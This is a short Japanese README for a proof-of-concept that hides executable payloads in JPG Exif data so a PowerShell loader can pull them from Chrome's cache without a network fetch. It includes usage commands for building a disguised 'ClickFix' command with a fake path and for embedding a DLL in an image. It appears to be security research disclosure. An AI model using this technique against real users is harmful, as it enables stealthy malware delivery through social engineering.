Cache Smuggling の Proof-of-Concept 進化版。この攻撃は、実行可能なペイロードを JPG の Exif データ内に隠蔽します。その結果、画像キャッシュ(Web ブラウザのキャッシュなど)を利用して、ペイロードを受動的にダウンロードすることができます。
その結果、サンプルローダー(chrome_poc.ps1)は、第2ステージのペイロードを取得するためにインターネットリクエストを行う必要がありません。代わりに、Chrome ブラウザのキャッシュからそれを抽出するだけです。
詳細はこちら: https://malwaretech.com/2025/10/exif-smuggling
python3 build_clickfix_cmd.py --input-file chrome_poc.ps1 --output-file encoded_command.txt --fake-path "C:\test\doc.txt"
python3 exif_smuggling.py --input-file image.jpg --output-file payload.jpg --payload hello_world.dll
www/index.html